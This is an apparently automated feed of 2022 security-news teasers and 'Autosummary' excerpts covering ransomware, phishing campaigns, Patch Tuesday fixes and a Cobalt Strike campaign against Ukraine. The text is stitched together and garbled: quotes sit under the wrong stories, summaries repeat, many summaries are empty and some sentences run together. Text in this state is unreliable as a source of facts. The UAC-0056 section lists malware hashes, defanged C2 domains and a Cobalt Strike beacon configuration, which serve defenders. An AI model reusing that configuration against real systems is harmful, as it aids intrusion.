“We see increasing regulation and demand for security in almost every IoT market, ranging from consumer IoT, automotive, industrial, telco, medical, and asset tracking,” said Frédéric Thomas, CTO of Kudelski IoT. "INKY researchers disclosed the latest variant of the tried-and-true phone scam, a low-tech phone scam where attackers extract personal information by sending out spoofed emails from what appears to be a legitimate source, with no suspicious links or malware attachments, just a pitch and a phone number. In this Help Net Security video, Roger Kay, VP of Security Strategy, INKY, talks about how this time around, attackers impersonated reputable retail brands such as Amazon, Apple, … More
The post How attackers abuse Quickbooks to send phone scam emails appeared first on Help Net Security.
"Autosummary:
"Traditional security approaches that rely on reactive, detect-and-respond measures and tedious manual processes can’t keep pace with the volume, variety, and velocity of current threats, according to Skybox Security. As a result, 27% of all executives and 40% of CSOs say their organizations are not well prepared for today’s rapidly shifting threat landscape. A tipping point for conventional cybersecurity On average, organizations experienced 15% more cybersecurity incidents in 2021 than in 2020. In addition, “material … More
The post Conventional cybersecurity approaches are falling short appeared first on Help Net Security.
"Autosummary:
Looking more closely at the ingredients of a risk-based approach and the specific practices that distinguish risk-oriented organizations from their less proficient peers, the benchmark study found that risk-based leaders excelled in key areas beyond the NIST framework, including: Attack surface visibility and context Attack simulation Exposure analysis Risk scoring Vulnerability assessments Research (threat intelligence) Technology assessments and consolidation The business impact of successful risk-based security management — versus the old status-quo, detect-and-respond approach — is measured in this research. "Sometimes phishers are just after your username and password, but other times they are after every scrap of sensitive information they can extract from you. To do that, they use tools like the phishing kit recently analyzed by Akamai researchers. By misusing the PayPal logo and general design, the phishing kit leads users through a set of pages and forms aimed at collecting information that can later be used to steal the victims’ identity and … More
The post PayPal-themed phishing kit allows complete identity theft appeared first on Help Net Security.
"Autosummary:
"51% of industrial organizations believe that the number of cyber attacks on smart factories is likely to increase over the next 12 months, according to the Capgemini Research Institute. Yet, 47% of manufacturers say cybersecurity in their smart factories is not a C-level concern. This Help Net Security video shows why smart factories need to prioritize their cybersecurity.
The post Smart factories need to prioritize their cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Microsoft published the exploit code for a vulnerability in macOS that can allow an attacker to escape the sandbox. Microsoft publicly disclosed technical details for an access issue vulnerability, tracked as CVE-2022-26706, that resides in the macOS App Sandbox. “Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted […]
The post Microsoft published exploit code for a macOS App sandbox escape flaw appeared first on Security Affairs.
"Autosummary:
In one of the hacking attempts, the researchers created a proof-of-concept (PoC) that used the -stdin option for the open Command on a Python file to bypass the “com.apple.quarantine” extended attribute restriction. The researchers also developed a shorted version of the exploit code that can be included in a Twitter post: Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, macOS) "Autosummary:
"Autosummary:
"Autosummary:
Warning about unusual account activity (Akamai) In a subsequent page, the victim is asked to provide a host of personal and financial details that include payment card data along with the card verification code, physical address, social security number, mother"s maiden name. Bogus CAPTCHA step on the phishing site (Akamai) After this stage, the victim is asked to log into their PayPal account using their email address and password, which are automatically delivered to the threat actor. "We take a look at a major ransomware attack impacting video game giant Bandai Namco, laced with the potential threat of data leakage.
The post Elden Ring maker Bandai Namco hit by ransomware and data leaks appeared first on Malwarebytes Labs.
"Autosummary:
Eurogamer published a Bandai Namco statement, which reads as follows: On 3rd July, 2022, Bandai Namco Holdings Inc. confirmed that it experienced an unauthorised access by third party to the internal systems of several Group companies in Asian regions (excluding Japan).In addition, there is a possibility that customer information related to the Toys and Hobby Business in Asian regions (excluding Japan) was included in the servers and PCs, and we are currently identifying the status about existence of leakage, scope of the damage, and investigating the cause. "A researcher found eight malware-laden apps in the Play Store which have been downloaded over 3 million times.
The post New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs appeared first on Malwarebytes Labs.
"Autosummary:
Malicious apps BleepingComputer posted the list of malicious apps found by Maxime Ingrao, which users may still have installed: Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads Coco Camera v1.1 (com.toomore.cool.camera) – 1,000 downloads Funny Camera by KellyTech – 500,000 downloads Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads Pradeo researchers have also identified four new malicious applications that embed the Joker malware: Smart SMS Messages 50.000+ installs Blood Pressure Monitor 10.000+ installs Voice Languages Translator 10.000+ installs Quick Test SMS 10.000+ installs How to avoid toll fraud malware Users that have any of the listed apps installed are advised to remove them as soon as possible. Also, always keep an eye on your background internet data, battery consumption, phone invoices, and bank statements, just in case. "Autosummary:
These include enabling conditional access policies (for instance, testing that logins are coming from trusted IP addresses and compliant devices), the deployment of anti-phishing defences at the email and web gateways, detection of unusual mailbox activity (such as the creation of suspicious inbox rules, and logins with unusual characteristics.) "Autosummary:
Microsoft tracks the newer variants as SiennaBlue (HolyRS.exe, HolyLocker.exe, and BTLC.exe) and notes that their functionality expanded over time to include multiple encryption options, string obfuscation, public key management, and internet/intranet support. "Cyble announced that it is now a credible source in the list of key contributors to VirusTotal‘s risk analysis. Being a part of VT’s list of website/domain scanning engine contributors will allow Cyble to extend its threat research even beyond its client base and serve the entire cybersecurity fraternity at large. Owned by Chronicle – a subsidiary of Alphabet Inc. (Google), VirusTotal offers threat research insights and reputation data to foster the analysis of suspicious … More
The post Cyble partners with VirusTotal to protect customers’ digital assets from targeted cyberattacks appeared first on Help Net Security.
"Autosummary:
With proprietary threat hunting models based on a combination of big data, ML+AI, and state-of-the-art threat research, Cyble alerts its users with sufficient context to understand cyber risks and prioritize them through real-time alerts and meaningful threat intelligence. "Autosummary:
Microsoft tracks the newer variants as SiennaBlue (HolyRS.exe, HolyLocker.exe, and BTLC.exe) and notes that their functionality expanded over time to include multiple encryption options, string obfuscation, public key management, and internet/intranet support. "Organizations vary by size, industry, level of maturity, but one thing that they all have in common is needing to know how to quickly remediate security vulnerabilities. As an experienced vulnerability management professional and a former system administrator who specialized in patching and remediated 800,000 vulnerabilities over the course of my career, I can offer some realistic perspective on this topic. One reoccurring discussion I’ve had is how long it takes for a new vulnerability … More
The post The enemy of vulnerability management? Unrealistic expectations appeared first on Help Net Security.
"Autosummary:
You can get into that range by setting due dates of 30, 60, 90, and 180 days for severities of critical, high, medium, and low, respectively. When it comes to how quickly to patch, I can talk about what the rest of the industry does, what the US government recommends, and what works from a system administrator perspective.Organizations vary by size, industry, level of maturity, but one thing that they all have in common is needing to know how to quickly remediate security vulnerabilities. "Autosummary:
"Autosummary:
Rounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service (CVE-2022-30216) and Microsoft Defender for Endpoint (CVE-2022-33637) and three denial-of-service (DoS) flaws in Internet Information Services (CVE-2022-22025 and CVE-2022-22040) and Security Account Manager (CVE-2022-30208). "A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim has enabled the MFA. In AiTM phishing, threat actors set up a proxy […]
The post Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021 appeared first on Security Affairs.
"Autosummary:
A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim has enabled the MFA. "The number of UK organizations implementing data encryption as a core part of their cybersecurity strategy has continued to rise, with 32% introducing a policy to encrypt all corporate information as standard in the last year. In total, 47% now require the encryption of all data, whether it’s at rest or in transit, according to Apricorn. This Help Net Security video highlights how remote working and rise in ransomware drive IT leaders to manage risk … More
The post Rise in ransomware drives IT leaders to implement data encryption appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"July"s Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.
The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.
"Autosummary:
Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates. Adobe released security updates for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp. "Autosummary:
The intrusions entailed setting up adversary-in-the-middle (AitM) phishing sites, wherein the adversary deploys a proxy server between a potential victim and the targeted website so that recipients of a phishing email are redirected to lookalike landing pages designed to capture credentials and MFA information. "Autosummary:
“While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie–and because the session cookie shows that MFA was already used to login–the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron, security awareness advocate at security awareness training firm KnowBe4, in an email to Threatpost. At this point, however, the attack does something unique using clever coding by automatically filling in the phishing landing page with the user’s email address, “thus enhancing its social engineering lure,” researchers noted. "Autosummary:
"Autosummary:
Lure tokens sent to thousands of users The goal was to re-direct the recipients to a scam website on the domain "uniswaplp[.]com," which impersonates the official Uniswap domain "uniswap.org." The operator appeared as "Uniswap V3: "While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.
"Autosummary:
024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea 474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d Payloads 0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470 aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346 501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff Cobalt Strike beacon and payloads 136.144.41[.]177 syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/ syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/ skreatortemp[.]site imolaoggi[.]euThis file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog: Figure 2: Detail of Vacancies and GoElephant dropper macros In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls: Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros The Help Ukraine lure, to our knowledge, has never been publicly documented before: Figure 4: Help Ukraine lure used in late July We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack: Figure 5: Similarities between different versions Also, in the past we have found comments regarding to a domain named ExcelVBA[.]ru.This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration: BeaconType – HTTPS Port – 443 SleepTime – 30000 PublicKey_MD5 – defb5d95ce99e1ebbf421a1a38d9cb64 C2Server – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/ UserAgent – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap HttpPostUri – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/ Watermark – 1580103824 By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised. "Autosummary:
A look at Lilith Upon execution, Lilith attempts to terminate processes that match entries on a hardcoded list, including Outlook, SQL, Thunderbird, Steam, PowerPoint, WordPad, Firefox, and more. "Autosummary:
Bandai Namco is a Japanese publisher of numerous popular video games, including Elden Ring, Dark Souls, Pac-Man, Tekken, Gundam, Soulcalibur, and many more. "Autosummary:
"2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2.
The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. For ransomware reviews by the Malwarebytes Threat Intel team, check out the following: March ransomware review April ransomware review May ransomware review June ransomware review Be ready and resilient in advance of ransomware attacks. Here’s how the top five industries ranked by number of ransomware attacks this spring: Services: 171 Manufacturing: 76 Technology: 65 Utilities: 61 Retail: 50 Noteworthy March attacks March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised.Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion. Top ransomware variants LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place.However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture. New ransomware trends In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. "In a world of ever-evolving cyberthreats, collaboration and knowledge exchange are vital for keeping an edge on attackers
The post Collaboration and knowledge sharing key to progress in cybersecurity appeared first on WeLiveSecurity
"Autosummary:
For example, disciplines such as threat intelligence process vast amounts of data to enhance security processes, platforms and open source development, using contributions and information provided by users, companies, government agencies, as well as efforts such as the MITRE ATT&CK framework, a knowledge bases that facilitates the exchange of information between organizations and researchers, and global conferences on cybersecurity that engage more and more people every year.Therefore, thinking of these new solutions from the security point of view will allow us to have more robust technology; as the human factor may not be removed, what we can do is minimize its impact,” adds Gutiérrez. "Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns, it inserts replies in active email threads. The threat continues to […]
The post Qakbot operations continue to evolve to avoid detection appeared first on Security Affairs.
"Autosummary:
“Other more subtle techniques are being deployed by threat actors to prevent automated detection and raise the odds that their attack will work, including obfuscating code, leveraging multiple URLs to deliver the payload, using unknown file extension names to deliver the payload, and altering the steps of the process by introducing new layers between initial compromise, delivery, and final execution.” "Autosummary:
"Popular comics site Mangatoon has been breached due to a poorly secured database.
The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.
"Autosummary:
You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.The breach exposed names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes. "The UK’s Information Commissioner’s Office (ICO) has concluded its investigation into the government’s use of private communication channels and is now urging ministers to review how messaging apps and personal email accounts are being used to conduct official government business.
A newly published report marks the conclusion of a yearlong investigation launched in 2021 by then-Information Commissioner Elizabeth Denham. The inquiry was initiated after concerns were raised into the use of the messaging service WhatsApp and private email accounts by former health secretary Matt Hancock and his deputy, James Bethell, at the Department of Health and Social Care (DHSC) during the height of the pandemic.
Autosummary:
In his opening remarks, John Edwards, who took over the role of Information Commissioner from Denham in January 2022, said that while it was understandable that new technologies had been rolled out in an effort to keep departments functioning during the pandemic, “the deployment of these technologies failed to appreciate the risks and issues around the security of information and managing transparency obligations.” "Autosummary:
Potential to Spread Ransomware Researchers also assessed with “moderate confidence” that callback operators in the campaign “will likely use ransomware to monetize their operation,” they said, “as 2021 BazarCall campaigns would eventually lead to Conti ransomware,” they said. "Autosummary:
"Autosummary:
"A large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites stole passwords, hijacked a user"s sign-in session, and skipped the authentication process even if the user had enabled multifactor authentication (MFA)," the Microsoft 365 Defender Research Team and Microsoft Threat Intelligence Center (MSTIC) said. "Autosummary:
"Autosummary:
However, over the past year, threat actors have increasingly used "callback" phishing campaigns that impersonate well-known companies requesting you call a number to resolve a problem, cancel a subscription renewal, or discuss another issue. "The July 2022 Patch Tuesday is upon us and has brought fixes for 84 CVEs in various Microsoft products, including an actively exploited zero-day: CVE-2022-22047, an elevation of privilege bug in Windows’ Client/Server Runtime Subsystem (CSRSS). “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft noted, but the attacker must first gain access to the system, usually by exploiting a separate code execution bug. Is it being used in widespread or targeted … More
The post Microsoft fixes exploited zero-day in Windows CSRSS (CVE-2022-22047) appeared first on Help Net Security.
"Autosummary:
Other vulnerabilities to prioritize Dustin Childs, with Trend Micro’s Zero Day Initiative, says that CVE-2022-30216, a “tampering” vulnerability in the Windows Server Service that may allow an authenticated attacker to upload a malicious certificate to a target server, should be patched quickly on critical servers. "Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt. The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt. The European Central Bank revealed that the hacking attempt took place recently, but the good news it that its experts […]
The post The President of European Central Bank Christine Lagarde targeted by hackers appeared first on Security Affairs.
"Autosummary:
"Autosummary:
" Potential implications By acquiring admin-level privileges on a target system, an attacker would be free to change the OS security settings, make changes to user accounts, access all files on the system without restrictions, and install additional software. "In some countries up to 90% of governmental websites add third-party tracker cookies without users’ consent. This occurs even in countries with strict user privacy laws, according to researchers Matthias Götze (TU Berlin), Srdjan Matic (IMDEA Software), Costas Iordanou (Cyprus University of Technology), Georgios Smaragdakis (TU Delft) and Nikolaos Laoutaris (IMDEA Networks). Previous studies have shown the widespread use of cookies to track users on websites, but this had not been studied so far on … More
The post Nearly all governmental websites serve cookies or third-party trackers appeared first on Help Net Security.
"Autosummary:
A total of 5,500 websites of international organizations, official COVID-19 information and governments of G20 countries were analyzed: Argentina, Australia, Brazil, Canada, China, France, Germany, India, Indonesia, Italy, Japan, Mexico, Russia, Saudi Arabia, South Africa, South Korea, Turkey, UK and USA. "A Youtuber has hacked into the CCTV cameras of an office used by tech support scammers and recorded them being arrested by the police.
The post Tech support scammers caught by their own cameras appeared first on Malwarebytes Labs.
"Autosummary:
CCTV The Youtuber, acting under the handle Scambaiter, turned his attention to Punjab in India to spy on a group of Tech Support scammers. "The notorious cybercriminal syndicate competes with Conti and Lockbit 3.0. They introduced an advanced search by stolen victim’s passwords, and confidential documents leaked in the TOR network. Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demand requests by the notorious Blackcat ransomware gang. According to experts, the notorious cybercriminal syndicate actively competes with Conti and the updated Lockbit 3.0, and recently introduced … More
The post BlackCat (aka ALPHV) ransomware is increasing stakes up to $2.5 million in demands appeared first on Help Net Security.
"Autosummary:
BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport. Blackcat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups practicing so called “quadruple extortion” by pressing victims to pay – leveraging encryption, data theft, denial of service (DoS) and harassment. "BlackCat (aka ALPHV) Ransomware gang introduced an advanced search by stolen victim’s passwords, and confidential documents. The notorious cybercriminal syndicate BlackCat competes with Conti and Lockbit 3.0. They introduced an advanced search by stolen victim’s passwords, and confidential documents leaked in the TOR network Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, […]
The post BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands appeared first on Security Affairs.
"Autosummary:
BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport.They introduced an advanced search by stolen victim’s passwords, and confidential documents leaked in the TOR network Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demand requests by the notorious Blackcat ransomware gang. "BleepingComputer reported a new ransomware operation named 0mega that is targeting organizations worldwide. 0mega is a new ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported. The ransomware operation has been active at least since May 2022 and already claimed to have breached multiple organizations. Victims of the ransomware reported that […]
The post Experts warn of the new 0mega ransomware operation appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Victim"s search data leak site Source: BleepingComputer This is a step forward in the extortion business as it puts pressure on the victim to pay the ransom and have the data removed from the web and avoid the potential risk of class action lawsuits. "Autosummary:
Then, with scores assigned and prioritization clearly defined, security teams can make step-by-step plans for remediation, making resolutions simple and making meaningful improvements to security posture with each step. "Ericsson, Thales, and Qualcomm Technologies are planning to take 5G out of this world and across a network of Earth-orbiting satellites. After having each conducted detailed research, which included multiple studies and simulations, the parties plan to enter smartphone-use-case-focused testing and validation of 5G non-terrestrial networks (5G NTN). The result could effectively mean that a future 5G smartphone could use 5G connectivity anywhere on Earth and provide complete global coverage for wideband data services, including … More
The post Ericsson partners with Thales and Qualcomm to deploy 5G networks into space appeared first on Help Net Security.
"Autosummary:
Erik Ekudden, Senior Vice President and Chief Technology Officer, Ericsson, says: “This testing and validation cooperation between Ericsson, Thales and Qualcomm Technologies will be a major milestone in the history of communications as the ultimate result could effectively mean that no matter where you are on Earth – in the middle of an ocean or the remotest forest – high-end, secure and cost-effective connectivity will be available through collaborative 5G satellite and terrestrial connectivity.” "Autosummary:
UM said at the time that it paid a 30 bitcoin ransom (roughly €200,000 at the time) for the ransomware decryptor, which allowed the university to avoid delaying exams and losing all the research, educational, and staff data, as well as info on salary payments for approximately 4,500 employees. "French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed administrative and management services. The company pointed out that threat actors may have accessed data of its customers, […]
The post French telephone operator La Poste Mobile suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
La réalité matérielle de l"attaque ne fait pas un doute, même si celle-ci était presque passée inaperçue… #ransomware https://t.co/Ef7u7jOah0 — Valéry Rieß-Marchive (@ValeryMarchive) July 8, 2022 The gang has been active since at least 2019 and today it is one of the most active ransomware gangs. "CISA warns of an unusual ransomware.
The post North Korean APT targets US healthcare sector with Maui ransomware appeared first on Malwarebytes Labs.
"Autosummary:
State-sponsored North Korean threat actors have been targeting the US Healthcare and Public Health (HPH) sector for the past year using the Maui ransomware, according to a joint cybersecurity advisory (CSA) from the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury. North Korean state-sponsored cyber-actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. "When it comes to insurance, better security means better savings.
The post 4 ways businesses can save money on cyber insurance appeared first on Malwarebytes Labs.
"Autosummary:
Endpoint detection and response (EDR) is a form of endpoint protection that detects and protects against ransomware, malware, trojans, rootkits, backdoors, viruses, brute force attacks, and “zero-day” unknown threats. For this article, we looked at security tips from the top five biggest cyber insurance companies—AXA XL, Chubb, AIG, Travelers, and AXIS—and found four commonalities across what they had to say. Better security means better savings Without cyber insurance, you can expect to pay a lot of cash to cover the cost of a data breach, and many companies are investing in it as a result. "Experts documented the evolution of the LockBit ransomware that leverages multiple techniques to infect targets and evade detection. The Cybereason Global Security Operations Center (GSOC) Team published the Cybereason Threat Analysis Reports that investigates the threat landscape and provides recommendations to mitigate their attacks. The researchers focused on the evolution of the Lockbit ransomware, they detailed two infections occurring […]
The post Evolution of the LockBit Ransomware operation relies on new techniques appeared first on Security Affairs.
"Autosummary:
“In other cases, affiliates would use a more traditional phishing email that will allow them to remotely connect to a network via an employee’s computer, or utilize malicious attachments, downloads, application patch exploits or vulnerabilities to gain access to a network.” "Autosummary:
"Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the previously undocumented Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) to distribute a previously undocumented backdoor on Windows systems. The Follina issue is a remote code execution vulnerability […]
The post Previously undocumented Rozena backdoor delivered by exploiting the Follina bug appeared first on Security Affairs.
"Autosummary:
The Rozena backdoor is able to inject a remote shell connection back to the attacker’s machine The attack chain leverages a weaponized Office document that once is clicked, it starts connecting to an external Discord CDN URL to download an HTML file (index.htm). "Autosummary:
The breach exposed names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes," tweeted the HIBP account. "Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […]
The post Apple Lockdown Mode will protect users against highly targeted cyberattacks appeared first on Security Affairs.
"Autosummary:
The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. "Taiwanese vendor QNAP wars of a new strain of ransomware, dubbed Checkmate, that is targeting its NAS devices. The Taiwanese vendor QNAP is warning of a new family of ransomware targeting its NAS devices using weak passwords. Threat actors are targeting devices exposed online with the SMB service enabled, they perform brute-force attacks against accounts […]
The post New Checkmate ransomware target QNAP NAS devices appeared first on Security Affairs.
"Autosummary:
In June, Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warned of a new wave of ech0raix ransomware attacks targeting QNAP Network Attached Storage (NAS) devices. Updating QTS, QuTS hero, or QuTScloud Log on to QTS, QuTS hero or QuTScloud as administrator. "Autosummary:
The list of previously released decryption tools includes Ragnarok, Avaddon, SynAck, AES-NI, Shade, FilesLocker, TeslaCrypt, Crysis, Ziggy, and FonixLocker. "We take a look at a report which indicates Brazil has a long way to go with regard to encrypting and backing up data.
The post Report: Brazil must do more to encrypt, back up data appeared first on Malwarebytes Labs.
"Autosummary:
that claim to perform backups (254 out of 385), despite implementing physical access control mechanisms to the storage location of these files, do not store them encrypted, which carries a risk of data leakage from the organization, which can cause enormous losses, especially if it involves sensitive and/or confidential information.66.6% of organizations that claim to perform backups (254 out of 385), despite implementing physical access control mechanisms to the storage location of these files, do not store them encrypted, which carries a risk of data leakage from the organization, which can cause enormous losses, especially if it involves sensitive and/or confidential information.60.2% of organizations (247 out of 410) do not keep their copies in at least one non-remotely accessible destination, which carries a risk that, in a cyberattack, the backup files themselves end up being corrupted, deleted and/or encrypted by the attacker or malware, rendering the organization’s backup/restore process equally ineffective. "QNAP Systems is warning about Checkmate, a new piece of ransomware targeting users of its network-attached storage (NAS) appliances. “Preliminary investigation indicates that Checkmate attacks via SMB services exposed to the internet, and employs a dictionary attack to break accounts with weak passwords,” the company says. “Once the attacker successfully logs in to a device, they encrypt data in shared folders and leave a ransom note with the file name ‘!CHECKMATE_DECRYPTION_README’ in each folder.” About … More
The post Checkmate ransomware hits QNAP NAS devices appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" LockBit, which operates on a ransomware-as-a-service (RaaS) model like most groups, was first observed in September 2019 and has since emerged as the most dominant ransomware strain this year, surpassing other well-known groups like Conti, Hive, and BlackCat. "Autosummary:
“For truly organizational crippling ransomware attacks, threat actors need to manually identify the important assets and the weak points to truly take down a victim,” observed John Bambenek, principal threat hunter at Netenrich, a security and operations analytics SaaS firm, in an email to Threatpost. “Cyber criminals want to get paid quickly and effectively, and with little information for the victim the attack is increasingly malicious in nature,” observed James McQuiggan, security awareness advocate at security firm KnowBe4, in an e-mail to Threatpost. "Autosummary:
"Word, Excel, and PowerPoint might close unexpectedly when opening, closing, saving, uploading, or downloading cloud files in Office Version 2205," the company described the issue on its support website. "Autosummary:
“The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands,” Fishbein wrote in the post. This hooking allows the malware to infect the whole machine and harvest credentials, evade detection, gain persistence, and provide remote access to the attackers, Fishbein wrote. "Emsisoft has released a free decryption tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. Cybersecurity firm Emsisoft released a free decryptor tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. The security firm states that the […]
The post Emsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for free appeared first on Security Affairs.
"Autosummary:
The Yashma decryptor released by the company works for the Chaos-based versions using .AstraLocker or a random .[a-z0-9]{4} extension. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @LawrenceAbrams, @fwosar, @VK_Intel, @demonslay335, @Seifreed, @struppigel, @FourOctets, @malwareforme, @DanielGallagher, @PolarToffee, @serghei, @jorntvdw, @Ionut_Ilascu, @malwrhunterteam, @billtoulas, @PogoWasRight, @ValeryMarchive, @vxunderground, @emsisoft, @Unit42_Intel, @AdvIntel, @CISecurity, @pcrisk, and @Amigo_A_. This week, information about attacks also became public, including IT services giant SHI, Quantum ransomware hitting PFC, and the US government warning that the Maui ransomware is targeting healthcare. "Autosummary:
"Scammers don"t take the summer off – be on your guard when buying your Crit"Air sticker
The post Driving to France this summer? Watch out for scam websites before you go appeared first on WeLiveSecurity
"Autosummary:
In other words, as a scammer, you do not have to successfully trick every possible victim for your site to successfully make you some quick, and almost free, money. "Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong to law enforcement officers and their internal systems. The emerging trend consists of threat actors sending fake subpoenas and EDR’s (Emergency Data Requests) to their victims from the hacked law enforcement email accounts. Using such capabilities, the … More
The post Cyberattacks against law enforcement are on the rise appeared first on Help Net Security.
"Autosummary:
